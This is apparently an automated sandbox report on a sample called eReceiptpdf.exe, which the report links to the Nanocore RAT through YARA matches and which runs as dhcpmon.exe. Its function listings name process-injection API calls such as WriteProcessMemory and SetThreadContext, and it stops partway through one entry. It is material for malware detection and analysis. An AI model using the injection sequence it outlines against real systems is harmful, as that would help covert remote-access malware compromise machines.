General

Start time:	03:03:26
Start date:	27/10/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Imagebase:	0x420000
File size:	182200 bytes
MD5 hash:	C97F7F2DEA671626AB1C6D3D1AD59422
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: dhcpmon.exe PID: 1308 Parent PID: 6428

General

Start time:	03:03:27
Start date:	27/10/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Imagebase:	0x340000
File size:	182200 bytes
MD5 hash:	C97F7F2DEA671626AB1C6D3D1AD59422
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: dhcpmon.exe PID: 6048 Parent PID: 6428

General

Start time:	03:03:27
Start date:	27/10/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Imagebase:	0xd40000
File size:	182200 bytes
MD5 hash:	C97F7F2DEA671626AB1C6D3D1AD59422
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: eReceiptpdf.exe PID: 7124 Parent PID: 5760 eReceiptpdf.exeCOMMON

Executed Functions

Function 01663650, Relevance: 4.7, Strings: 3, Instructions: 979COMMON

Download Yara Rule

Strings

D08m, xrefs: 01663CB9
D08m, xrefs: 01663BB9
D08m, xrefs: 01663B2C

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID:
String ID: D08m$D08m$D08m
API String ID: 0-1217470602
Opcode ID: d55c483e117a04e17373d0ba5132dc2283ff18ab071dc50793d931a20a536d95
Instruction ID: c6e9cd8281113dbfe411b7cdfd33883c4f432fa860c54076b13ac7f47fe43d59
Opcode Fuzzy Hash: d55c483e117a04e17373d0ba5132dc2283ff18ab071dc50793d931a20a536d95
Instruction Fuzzy Hash: 6D829270A002199FDB14CFA9C884AAEBBFAFF88304F158469E519DB365DB35DC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01660659, Relevance: 1.7, Strings: 1, Instructions: 441COMMON

Download Yara Rule

Strings

x3m, xrefs: 01660DE7

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID:
String ID: x3m
API String ID: 0-3016242523
Opcode ID: 2c68ed9b52f40b670a7ed033463aa202a5752278995090e6200cd53aabba3a53
Instruction ID: f8c0ed76bf9e282aa0f3fba88d9b0257cd389a1554fdd66c446a9cb05b911374
Opcode Fuzzy Hash: 2c68ed9b52f40b670a7ed033463aa202a5752278995090e6200cd53aabba3a53
Instruction Fuzzy Hash: C0228C74A00228CFDB64CFA9C884BDDBBB2BB89304F1085E9D409AB355DB319E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0166A038, Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

D08m, xrefs: 0166A334

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID:
String ID: D08m
API String ID: 0-902124792
Opcode ID: fcf396f480e572d2995d520971d3fd911bb487916db51219fd141dfeb576a0fa
Instruction ID: 4ff267fc19bfcde230dd9e6714a8efb282597733c8d4823608aaef88ddd4b5b3
Opcode Fuzzy Hash: fcf396f480e572d2995d520971d3fd911bb487916db51219fd141dfeb576a0fa
Instruction Fuzzy Hash: D4817134F042289FCB189BF4985467E76BBBFC8604F19882DE417EB388DF3598469791

Uniqueness

Uniqueness Score: -1.00%

Function 016694E4, Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3968f3dae7e911e783f5bfdc8f036f7fb0741ad394b5509ffce5f45f93a09cf1
Instruction ID: aabaad38a7215dee53e1ba069d20350efe2d1874d76bdc4f9ff98cc5f9885617
Opcode Fuzzy Hash: 3968f3dae7e911e783f5bfdc8f036f7fb0741ad394b5509ffce5f45f93a09cf1
Instruction Fuzzy Hash: 35D1A174E00229CFDB64DFA9C980B9DBBB6BF89304F1081A9D409AB355DB349E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 016613C6, Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33805dd51b1354e569861fbf29ffc50fc1fe37a5f9cee50ebb86caf7557255b6
Instruction ID: 3aff497b434eb3a598c18b13f71cd106918761839e2099ed56de0daa73446856
Opcode Fuzzy Hash: 33805dd51b1354e569861fbf29ffc50fc1fe37a5f9cee50ebb86caf7557255b6
Instruction Fuzzy Hash: 09D19F74E00228CFDB64CFA9C884B9DBBB6BF89300F1085A9D409AB355DB319E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01668EF6, Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6406c49cc3275302cb855fd2cfb6ab010f93b2b8964733ef1a54419dceda21a
Instruction ID: e0e0a008f20ceeba0bb3d2942f752cd48b333c3b5a2015e330d1ae8c1d4cc279
Opcode Fuzzy Hash: e6406c49cc3275302cb855fd2cfb6ab010f93b2b8964733ef1a54419dceda21a
Instruction Fuzzy Hash: 12D1B074E00218CFDB64DFA9C984B9DBBB6BF89304F2481A9D508AB355DB309E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01660F09, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40b58da877c02455bf3a1809eae21aca596075d1e6ceeb08535a51902ff89db4
Instruction ID: 0c9b08723ffa0568560ac77a604af1f0c6001119d4bc4738a919a04390305834
Opcode Fuzzy Hash: 40b58da877c02455bf3a1809eae21aca596075d1e6ceeb08535a51902ff89db4
Instruction Fuzzy Hash: 6F81C474E00608DFDB54CFA9D894A9DBBB2FF89305F219069E915AB365DB31AC46CF00

Uniqueness

Uniqueness Score: -1.00%

Function 01660F18, Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9da8640377a65422fa08beaac72bbb93832b28c5df41ded310e17e4e794984dd
Instruction ID: 13877dff4b59880422d75b75914fefc26eb4e4202d5a3f0208aae13d2e7513ea
Opcode Fuzzy Hash: 9da8640377a65422fa08beaac72bbb93832b28c5df41ded310e17e4e794984dd
Instruction Fuzzy Hash: 1A81B374E00208DFDB14DFA9C894A9DBBB6FF89305F219069E915AB365DB31AC46CF00

Uniqueness

Uniqueness Score: -1.00%

Function 01668B28, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 296libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(?,?,?), ref: 01668E3A

Strings

/8m, xrefs: 01668B5D

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: /8m
API String ID: 1029625771-1020436917
Opcode ID: 782c0423fbfc76152a109bd5d7f9a30d24d2f58427e86db173d09d725300be3c
Instruction ID: c756580e250c42fbfc565c4cdb0fe49c888bb8df6b8dd81030bdee551dae280e
Opcode Fuzzy Hash: 782c0423fbfc76152a109bd5d7f9a30d24d2f58427e86db173d09d725300be3c
Instruction Fuzzy Hash: 02A18C74B007198FDB24DFB9D8946AEBBFAAF84344F158429D516EB384DB348802CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0166DAA4, Relevance: 1.8, APIs: 1, Instructions: 324processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0166DD77

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c18658aca95eb0b41f60a469ac2cc289ee35d0707b1797c3b3ec00eac1643a83
Instruction ID: 7d3f29080150cbcb97ab85b828dad26f1cde5bfed29607295508bb6961994740
Opcode Fuzzy Hash: c18658aca95eb0b41f60a469ac2cc289ee35d0707b1797c3b3ec00eac1643a83
Instruction Fuzzy Hash: FDC11471E002298FDB20DFA8CC80BEDBBB5BF49304F0485AAD459B7240DB749A85CF84

Uniqueness

Uniqueness Score: -1.00%

Function 0166DAB0, Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0166DD77

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e43b4024f72995c39889cfba5af9694150bebc984cf8b352d3aa39e33c30cdf0
Instruction ID: 6f38fe2d5f397342ca5e6316e5c562a22cf6d7e23739fd0dd9f65ea9e2191530
Opcode Fuzzy Hash: e43b4024f72995c39889cfba5af9694150bebc984cf8b352d3aa39e33c30cdf0
Instruction Fuzzy Hash: 56C102B1E002698FDB20DFA8CC40BEDBBB5BF49304F0485AAD559B7240DB749A85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0166E330, Relevance: 1.7, APIs: 1, Instructions: 238COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0166E399

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ff03e0767b099599b678abcf663318451d9030196dfea88b5540e94ba08b8d7e
Instruction ID: e5a9520adaad7f94bcfb39020c0cb0c6b5f2cdbc28dcc206db54d2783c7f7abf
Opcode Fuzzy Hash: ff03e0767b099599b678abcf663318451d9030196dfea88b5540e94ba08b8d7e
Instruction Fuzzy Hash: 1BA16B74A00119CBDB18DFA9D8887DCBBFAFF84354F288828D101EB394D7369995CB24

Uniqueness

Uniqueness Score: -1.00%

Function 01668577, Relevance: 1.6, APIs: 1, Instructions: 138libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(?,?,?), ref: 01668E3A

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e6e049494f6c6e1eb08d3a5b23b3c035b0d8e2219d4b415d38375d6ef6e91434
Instruction ID: 52036b42f8be111afea220d996c721f12c0e2912fa11c7ec1ecfbb23f99d6518
Opcode Fuzzy Hash: e6e049494f6c6e1eb08d3a5b23b3c035b0d8e2219d4b415d38375d6ef6e91434
Instruction Fuzzy Hash: 1D51FEB4D043489FDB20CFA9D884ADEBBB9AF59314F14812AE814AB391D7749845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0166D722, Relevance: 1.6, APIs: 1, Instructions: 117injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0166D7FB

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 16182b88c97651fa3448c8aaf1bb6d72bc417b269c28aaea1edc25abfbebeb0a
Instruction ID: 9e4e514a87caeec21c1e668bd5945abc5ec6c44318fe18a0fd67941828fa9852
Opcode Fuzzy Hash: 16182b88c97651fa3448c8aaf1bb6d72bc417b269c28aaea1edc25abfbebeb0a
Instruction Fuzzy Hash: 8641A9B4D012589FCF10CFA9D984AEEBBB5BF49314F14942AE818B7210D738AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0166D728, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0166D7FB

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d6a75ae09b89a959c0cb71f0d16e080530517cb644fd63263a9e18b4487cee30
Instruction ID: 3f33f145811d26615193a9c989294bfbca28faf4c19ca76a72faddfe9a8f3535
Opcode Fuzzy Hash: d6a75ae09b89a959c0cb71f0d16e080530517cb644fd63263a9e18b4487cee30
Instruction Fuzzy Hash: B34199B5D012589FCF10CFA9D984AEEBBF5BF49314F14942AE818B7200D738AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0166D878, Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0166D932

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 6fdd0abbbadb23e2e78bb587615df6dc3ea1bb0fed7ef4f5fe4dbd55e4e89064
Instruction ID: db4876475093cf1cc294ea8d0bee777caca50493094f73839844fd4e4d2b96cd
Opcode Fuzzy Hash: 6fdd0abbbadb23e2e78bb587615df6dc3ea1bb0fed7ef4f5fe4dbd55e4e89064
Instruction Fuzzy Hash: 3C4196B5D002589FCF10CFE9D884AEEFBB6BB49320F14942AE855B7200D735A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0166BD70, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

SetKernelObjectSecurity.KERNELBASE(?,?,?), ref: 0166CAA4

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: KernelObjectSecurity
String ID:
API String ID: 3015937269-0
Opcode ID: 15acecc6d6dca0c4d4b746be337073dea9fad7e4c98fce84c02321cf45718f5d
Instruction ID: 3e85695afa1a87aebe69a490f74c8b84538759ec206a56e28f61dc10754de6ef
Opcode Fuzzy Hash: 15acecc6d6dca0c4d4b746be337073dea9fad7e4c98fce84c02321cf45718f5d
Instruction Fuzzy Hash: 5541B9B5D006589FCB00CFA9D884ADEBBF5BF49314F14842AE854BB310D334A946CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0166D880, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0166D932

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 524a37f6102de335c2e0d6cd3931e6f75c1d30ecb6eb2f48f869df4777eeecb5
Instruction ID: 9b975be0d1fd9bb27a00335af8db2e212a36d7cf67c9b78557c5c3d16417a8bb
Opcode Fuzzy Hash: 524a37f6102de335c2e0d6cd3931e6f75c1d30ecb6eb2f48f869df4777eeecb5
Instruction Fuzzy Hash: 694188B5D002589FCF10CFEAD884AEEFBB5BB49324F14942AE855B7200D735A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0166D600, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0166D6B2

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7d3dc77086efe3fdeb43054a0bb6e4c93be2c211bf09b4700dd0ce83f90a3c8d
Instruction ID: db54c7e47e6388979c4479995916bf9dba20c357d03b76f3e2f207a066f04e6d
Opcode Fuzzy Hash: 7d3dc77086efe3fdeb43054a0bb6e4c93be2c211bf09b4700dd0ce83f90a3c8d
Instruction Fuzzy Hash: 793197B9E002589FCF10CFA9D880AEEBBB5BF49310F10942AE854B7310D735A946CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0166C9E0, Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SetKernelObjectSecurity.KERNELBASE(?,?,?), ref: 0166CAA4

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: KernelObjectSecurity
String ID:
API String ID: 3015937269-0
Opcode ID: 97dc2af211fba804cd81508cbf31bdaf1362be38b38a279a8aeba9b0a2889606
Instruction ID: cfb824064bd4d365cf6c8f854bc302b291b7ac2766ae6621568d7e23460f611d
Opcode Fuzzy Hash: 97dc2af211fba804cd81508cbf31bdaf1362be38b38a279a8aeba9b0a2889606
Instruction Fuzzy Hash: 564185B5D006589FCB10CFA9D884AEEBBF5BF49314F14902AE858B7310D774AA46CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0166BD7C, Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SetKernelObjectSecurity.KERNELBASE(?,?,?), ref: 0166CAA4

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: KernelObjectSecurity
String ID:
API String ID: 3015937269-0
Opcode ID: 43784c8c3857a93cd945c48187d69e1b25a3eb550522bfd0a3d00e51a8bc42c0
Instruction ID: 35492140e48dcc407c6a6174dcbefce8ad8557a794a051369fc67d0227ea9d93
Opcode Fuzzy Hash: 43784c8c3857a93cd945c48187d69e1b25a3eb550522bfd0a3d00e51a8bc42c0
Instruction Fuzzy Hash: 544188B5D006589FCB10CFA9D984AEEBBF5BF49314F14902AE854B7310D374A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0166D608, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0166D6B2

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f87c034c03bc59f2beef82e562736babc1a8a5649d130b6993fe1730c1e3f093
Instruction ID: 462f95913b6aee3aee73f44afe878fa3b50cc28bc0ed0b26875dcaa4cbaf3192
Opcode Fuzzy Hash: f87c034c03bc59f2beef82e562736babc1a8a5649d130b6993fe1730c1e3f093
Instruction Fuzzy Hash: 4C3176B9D002589BCF10CFA9D980AEEBBB5BB49324F10942AE815B7310D735A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0166DF48, Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 0166E8F6

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 2f0b08e8bab3b3875801d1e9a25ce487150771e132bdafe9877bf1568c5e37dc
Instruction ID: 300711fb31113cfaa67dcbc5b07c6b6c334c6958a15b05edd7d51e35bb44774e
Opcode Fuzzy Hash: 2f0b08e8bab3b3875801d1e9a25ce487150771e132bdafe9877bf1568c5e37dc
Instruction Fuzzy Hash: 8D3176B8D002589FCB10CFA9D984ADEFBB5BB09310F14942AE818B7310D735A945CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 01669960, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 01669A0F

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8a1a02e37172b9184a4b90c3c93c86e26c7f016ec896cc850e3f2ee43f2fa126
Instruction ID: f4b9408d002814ed3fea90d1ca222e3fa0214e072e19ac01e354ef60087072da
Opcode Fuzzy Hash: 8a1a02e37172b9184a4b90c3c93c86e26c7f016ec896cc850e3f2ee43f2fa126
Instruction Fuzzy Hash: 263176B9D042589FCF10CFA9E884AEEFBB5AF59314F14902AE814B7210D735AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0166D0D1, Relevance: 1.6, APIs: 1, Instructions: 96threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNEL32(?,?), ref: 0166D187

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 5dfbf06bd5cb768e48b9901e2f5903aaffac4c0676d459ed4059d2071273704d
Instruction ID: aaf95b8bce9d77f419a3f62a86339aed54f1ed2def9dc30074faeaa6184ba5e1
Opcode Fuzzy Hash: 5dfbf06bd5cb768e48b9901e2f5903aaffac4c0676d459ed4059d2071273704d
Instruction Fuzzy Hash: 5941BAB5D00258DFDB10CFE9D884AEEFBB5AF48314F14842AE414B7200C778A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0166E84A, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 0166E8F6

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f6f88eddf9260361c8f8c8a2b3f276b58d10e8261d9ec5cf2f84e3ce770ed0a1
Instruction ID: 01438b1063bfd4b9377a254e354770597350477f5ab0bbbe49737dd67c73e152
Opcode Fuzzy Hash: f6f88eddf9260361c8f8c8a2b3f276b58d10e8261d9ec5cf2f84e3ce770ed0a1
Instruction Fuzzy Hash: 383155B9D002589FCB10CFA9D984ADEFBB5BB49310F14942AE818B7310D735A9458F64

Uniqueness

Uniqueness Score: -1.00%

Function 0166D0D8, Relevance: 1.6, APIs: 1, Instructions: 94threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNEL32(?,?), ref: 0166D187

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: a537c2422c5e19b3e239e4de718b6d38389f1d691bc986e0961a5098b87166df
Instruction ID: 79b1d56c35cc03c28fb8e041b5d7c5cf30f994492586fceae29e42960edd878c
Opcode Fuzzy Hash: a537c2422c5e19b3e239e4de718b6d38389f1d691bc986e0961a5098b87166df
Instruction Fuzzy Hash: 1831A9B4D00258DFDB14CFEAD884AEEFBB5AF49314F14842AE454B7200D778A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 01669968, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 01669A0F

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 2e1c7dbbd202e7f215aa98d7146c1629bccaffab877defa8cea556a8de36855c
Instruction ID: 22c6c98b609c59ac5eee9ad3207a61007ef16e1a404f889178d65c1fc27c8141
Opcode Fuzzy Hash: 2e1c7dbbd202e7f215aa98d7146c1629bccaffab877defa8cea556a8de36855c
Instruction Fuzzy Hash: 2E3176B9D042589FCF10CFA9E884AEEFBF5AB19314F14902AE814B7210D775A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 015BD4A0, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.338119928.00000000015BD000.00000040.00000001.sdmp, Offset: 015BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a41d57e0d568da2c068ad9e4e60698ca63d27a5231249f903c52efa59e308b5
Instruction ID: d70173525e390bd50976836cff55d310a35cf77adfe3234998ce191d2a24e83f
Opcode Fuzzy Hash: 5a41d57e0d568da2c068ad9e4e60698ca63d27a5231249f903c52efa59e308b5
Instruction Fuzzy Hash: 712128B1504244DFDB05CF94D8C0BAABFB5FB8432CF248969D9050F246C33AD855CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 015BD49B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.338119928.00000000015BD000.00000040.00000001.sdmp, Offset: 015BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a26b7e00566609b61cc6e7b6904e6af9279d8b55cc0f39cc8370a306dd16ad
Instruction ID: b1fed09ccedf7bfc9766682f5d43fda347e5373c003fdb210343710ead2eac61
Opcode Fuzzy Hash: 67a26b7e00566609b61cc6e7b6904e6af9279d8b55cc0f39cc8370a306dd16ad
Instruction Fuzzy Hash: 3B11B1B6504280CFDB12CF58D5C4B5ABF71FB84328F2486A9D9050F656C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01669324, Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a3bacb6d5e67335c0fb196bcb2c4799124c3bdd8e3f54f18fae1e564da4db31
Instruction ID: b116553b624c49daa3ee817f3b785b4e5270f2725045473e37fe2bc9397ff233
Opcode Fuzzy Hash: 6a3bacb6d5e67335c0fb196bcb2c4799124c3bdd8e3f54f18fae1e564da4db31
Instruction Fuzzy Hash: 0C41FFB4D042589FDF14CFA9D884AEEBBB5BF49314F24912AE815BB350D7349885CF84

Uniqueness

Uniqueness Score: -1.00%

Function 01669330, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.338324574.0000000001660000.00000040.00000001.sdmp, Offset: 01660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 095e51023eebe93501b97636c1583f985c951d368dfc78fa831944febdcf3b50
Instruction ID: fc4339547f0fd7b916961887d885fc624876c9f58f59a5b429ec49740195cd9d
Opcode Fuzzy Hash: 095e51023eebe93501b97636c1583f985c951d368dfc78fa831944febdcf3b50
Instruction Fuzzy Hash: 5641FFB0D042489FDB14CFA9D884AAEBBB5BF49314F20912AE815BB350D7749845CF84

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: dhcpmon.exe PID: 6428 Parent PID: 3352 dhcpmon.exeCOMMON

Executed Functions

Function 02DE8B28, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 291libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNELBASE(?,?,?), ref: 02DE8E3A

Strings

/8m, xrefs: 02DE8B5D

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: /8m
API String ID: 1029625771-1020436917
Opcode ID: 521f559620ed94ad0ae9fefed7fb8afcac24d202022470a1650f2b687d9d1096
Instruction ID: 107ec2b8672b42fafaa0b63b1950311c2a0341baac81d2d46817cdba68423700
Opcode Fuzzy Hash: 521f559620ed94ad0ae9fefed7fb8afcac24d202022470a1650f2b687d9d1096
